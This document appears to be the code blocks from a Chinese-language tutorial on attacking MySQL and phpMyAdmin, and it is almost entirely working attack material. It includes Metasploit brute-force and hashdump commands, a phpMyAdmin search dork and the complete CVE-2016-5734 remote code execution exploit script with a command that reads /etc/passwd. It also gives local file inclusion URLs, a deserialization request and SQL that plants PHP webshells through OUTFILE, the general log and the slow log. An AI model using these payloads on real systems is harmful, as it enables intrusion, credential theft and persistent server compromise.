1

port="3306"

 1
 2
 3
 4
 5
 6
 7
 8
 9
10

msf6 > use auxiliary/scanner/mysql/mysql_login 
msf6 auxiliary(scanner/mysql/mysql_login) > set RHOSTS 192.168.1.145
RHOSTS => 192.168.1.145
msf6 auxiliary(scanner/mysql/mysql_login) > set user_file user.txt
user_file => user.txt
msf6 auxiliary(scanner/mysql/mysql_login) > set pass_file passwd.txt
pass_file => passwd.txt
msf6 auxiliary(scanner/mysql/mysql_login) > set STOP_NO_SUCCESS true
[!] Unknown datastore option: STOP_NO_SUCCESS. Did you mean STOP_ON_SUCCESS?STOP_NO_SUCCESS => true
msf6 auxiliary(scanner/mysql/mysql_login) > exploit 

1
2
3
4
5
6
7

for i in `seq 1 1000`; do
  mysql -h 127.0.0.1 -P 3306 -uroot -p123 2>/dev/null
done
 
use auxiliary/scanner/mysql/mysql_authbypass_hashdump
set rhost 127.0.0.1
exploit

1

inurl:phpmyadmin

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119

#!/usr/bin/env python

"""cve-2016-5734.py: PhpMyAdmin 4.3.0 - 4.6.2 authorized user RCE exploit
Details: Working only at PHP 4.3.0-5.4.6 versions, because of regex break with null byte fixed in PHP 5.4.7.
CVE: CVE-2016-5734
Author: https://twitter.com/iamsecurity
run: ./cve-2016-5734.py -u root --pwd="" http://localhost/pma -c "system('ls -lua');"
"""

import requests
import argparse
import sys

__author__ = "@iamsecurity"

if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument("url", type=str, help="URL with path to PMA")
    parser.add_argument("-c", "--cmd", type=str, help="PHP command(s) to eval()")
    parser.add_argument("-u", "--user", required=True, type=str, help="Valid PMA user")
    parser.add_argument("-p", "--pwd", required=True, type=str, help="Password for valid PMA user")
    parser.add_argument("-d", "--dbs", type=str, help="Existing database at a server")
    parser.add_argument("-T", "--table", type=str, help="Custom table name for exploit.")
    arguments = parser.parse_args()
    url_to_pma = arguments.url
    uname = arguments.user
    upass = arguments.pwd
    if arguments.dbs:
        db = arguments.dbs
    else:
        db = "test"
    token = False
    custom_table = False
    if arguments.table:
        custom_table = True
        table = arguments.table
    else:
        table = "prgpwn"
    if arguments.cmd:
        payload = arguments.cmd
    else:
        payload = "system('uname -a');"

    size = 32
    s = requests.Session()
    # you can manually add proxy support it's very simple ;
    # s.proxies = {'http': "127.0.0.1:8080", 'https': "127.0.0.1:8080"}
    s.verify = False
    sql = '''CREATE TABLE `{0}` (
      `first` varchar(10) CHARACTER SET utf8 NOT NULL
    ) ENGINE=InnoDB DEFAULT CHARSET=latin1;
    INSERT INTO `{0}` (`first`) VALUES (UNHEX('302F6500'));
    '''.format(table)

    # get_token
    resp = s.post(url_to_pma + "/?lang=en", dict(
        pma_username=uname,
        pma_password=upass
    ))
    if resp.status_code is 200:
        token_place = resp.text.find("token=") + 6
        token = resp.text[token_place:token_place + 32]
    if token is False:
        print("Cannot get valid authorization token.")
        sys.exit(1)

    if custom_table is False:
        data = {
            "is_js_confirmed": "0",
            "db": db,
            "token": token,
            "pos": "0",
            "sql_query": sql,
            "sql_delimiter": ";",
            "show_query": "0",
            "fk_checks": "0",
            "SQL": "Go",
            "ajax_request": "true",
            "ajax_page_request": "true",
        }
        resp = s.post(url_to_pma + "/import.php", data, cookies=requests.utils.dict_from_cookiejar(s.cookies))
        if resp.status_code == 200:
            if "success" in resp.json():
                if resp.json()["success"] is False:
                    first = resp.json()["error"][resp.json()["error"].find("<code>")+6:]
                    error = first[:first.find("</code>")]
                    if "already exists" in error:
                        print(error)
                    else:
                        print("ERROR: " + error)
                        sys.exit(1)
    # build exploit
    exploit = {
        "db": db,
        "table": table,
        "token": token,
        "goto": "sql.php",
        "find": "0/e\0",
        "replaceWith": payload,
        "columnIndex": "0",
        "useRegex": "on",
        "submit": "Go",
        "ajax_request": "true"
    }
    resp = s.post(
        url_to_pma + "/tbl_find_replace.php", exploit, cookies=requests.utils.dict_from_cookiejar(s.cookies)
    )
    if resp.status_code == 200:
        result = resp.json()["message"][resp.json()["message"].find("</a>")+8:]
        if len(result):
            print("result: " + result)
            sys.exit(0)
        print(
            "Exploit failed!\n"
            "Try to manually set exploit parameters like --table, --database and --token.\n"
            "Remember that servers with PHP version greater than 5.4.6"
            " is not exploitable, because of warning about null byte in regexp"
        )
        sys.exit(1)

1

python .\CVE-2016-5734.py -u root -p root http://192.168.165.41:8080/ -c "system('cat /etc/passwd')"

1

http://192.168.0.108:8080/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd

1

SELECT '<?php phpinfo()?>'      //执行phpinfo命令

1
2
3

http://192.168.0.104:8080/index.php?target=db_sql.php%253f/../../../../../../../../tmp/sess_5587bc62c8c09503e2882a8594d89ff7

//5587bc62c8c09503e2882a8594d89ff7 Cookie值

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15

POST /scripts/setup.php HTTP/1.1
Host: 192.168.0.104:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:139.0) Gecko/20100101 Firefox/139.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Referer: http://192.168.0.104:8080/
Cookie: phpMyAdmin=5587bc62c8c09503e2882a8594d89ff7; pma_lang=zh_CN
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Type: application/x-www-form-urlencoded
Content-Length: 80

action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}

1

show global variables like '%secure%';      //查看secure_file_priv    

1
2
3

当 secure_file_priv 的值为 NULL ，表示限制 mysqld 不允许导入|导出，此时无法提权
当 secure_file_priv 的值为 /tmp/ ，表示限制 mysqld 的导入|导出只能发生在 /tmp/ 目录下，此时也无法提权
当 secure_file_priv 的值没有具体值时，表示不对 mysqld 的导入|导出做限制，此时可提权

1
2
3
4

show variables like "%plugin%";      //查看mysql安装目录

//写入1句话木马
select '<?php phpinfo(); ?>' INTO OUTFILE 'C:\\phpstudy\\phpstudy_pro\\WWW\\b.php'  

1
2
3

SHOW VARIABLES LIKE '%general%'

general_log_file为日志保存的位置

1
2
3
4
5
6

set global general_log = on;

//修改日志目录为shell地址
set global general_log_file='C:\\phpstudy\\phpstudy_pro\\WWW\\webapp.php';
//在日志文件中写入Shell
select '<?php eval($_POST[cmd]);?>'

1
2

show global variables like '%long_query_time%'
show global variables like '%long%'

1
2

查看慢日志参数
show global variables like '%slow%'

1
2
3
4

set global slow_query_log=1 		# 打开慢日志
set global slow_query_log_file='C:\\phpstudy\\phpstudy_pro\\WWW\\webbpp.php'	# 慢日志的路径【注意：一定要用双反斜杠】
SELECT '<?php @eval($_POST[1]);?>' or sleep(11)		# 这儿11是超过慢日志的10秒时间
SELECT '<?php phpinfo();?>' or sleep(11)